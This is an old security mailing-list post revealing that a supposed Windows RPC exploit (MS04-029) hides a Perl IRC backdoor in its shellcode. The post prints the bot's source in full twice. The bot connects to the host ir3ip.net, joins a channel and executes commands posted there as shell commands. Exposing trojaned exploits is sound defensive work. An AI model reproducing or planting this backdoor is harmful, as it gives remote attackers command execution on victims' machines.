[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <418A13BC.9090202@inf.ufsc.br>
From: emilio at inf.ufsc.br (EmÃlio Wuerges)
Subject: New Remote Windows Exploit (MS04-029)
It was much more easier to do:
$ gcc exploit.c
$ strings a.out
/lib/ld-linux.so.2
libc.so.6
memcpy
perror
chmod
fprintf
fseek
strncpy
sscanf
memset
fclose
exit
fopen
atoi
_IO_stdin_used
__libc_start_main
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh
#!/usr/bin/perl
$chan="#0x";$nick="k";$server="ir3ip.net";$SIG{TERM}={};exit if fork;use
IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print
$sock "USER k +i k :kv1\nNICK k\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
$mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK
$nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan
:Hi\n";while(<$sock>){if (/^PING (.*)$/){print $sock "PONG $1\nJOIN
$chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]*
(.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG
$chan :$_\n";sleep 1;}}}#/tmp/hi
*** MaxLoad (windows rpc exploit) v.1 ***
For educational propose only!
error: you must enter a valid ip
usage:%s [IP-ADDRESS]
e.g: %s 192.168.1.23
error in ip address: sscanf
error: alignment could not be done
://[
Successfully send payload!
Try connect to %s port 31337
/tmp/hi
Tada!!
--
Em?lio Wuerges
--
Ci?ncias da Computa??o (cco021)
Universidade Federal de Santa Catarina
--
--
Once you've seen one nuclear war, you've seen them all.
--
Barrie Dempster wrote:
>Excellent exploit, I'm sure no one will spot that perl IRC bot in there,
>nope no one will see that...
>
>(hint for the readers, try looking at the ascii out put of the "char
>*shellcode_payload=" data, looks a little like the following....)
>
>[code]
>#!/usr/bin/perl
>$c
>han="#0x";$nick="k
>";$server="ir3ip.n
>et";$SIG{TERM}={};
>exit if fork;use I
>O::Socket;$sock =
>IO::Socket::INET->
>new($server.":6667
>")||exit;print $so
>ck "USER k +i k :k
>v1\nNICK k\n";$i=1
>;while(<$sock>=~/^
>[^ ]+ ([^ ]+) /){$
>mode=$1;last if $m
>ode=="001";if($mod
>e=="433"){$i++;$ni
>ck=~s/\d*$/$i/;pri
>nt $sock "NICK $ni
>ck\n";}}print $soc
>k "JOIN $chan\nPRI
>VMSG $chan :Hi\n";
>while(<$sock>){if
>(/^PING (.*)$/){pr
>int $sock "PONG $1
>\nJOIN $chan\n";}i
>f(s/^[^ ]+ PRIVMSG
> $chan :$nick[^ :\
>w]*:[^ :\w]* (.*)$
>/$1/){s/\s*$//;$_=
>`$_`;foreach(split
> "\n"){print $sock
> "PRIVMSG $chan :$
>_\n";sleep 1;}}}#/
>tmp/hi
>
>[/code]
>
>--
>Barrie Dempster (zeedo) - Fortiter et Strenue
>
> http://www.bsrf.org.uk
>
>[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
>
>
>
>
>
Powered by blists - more mailing lists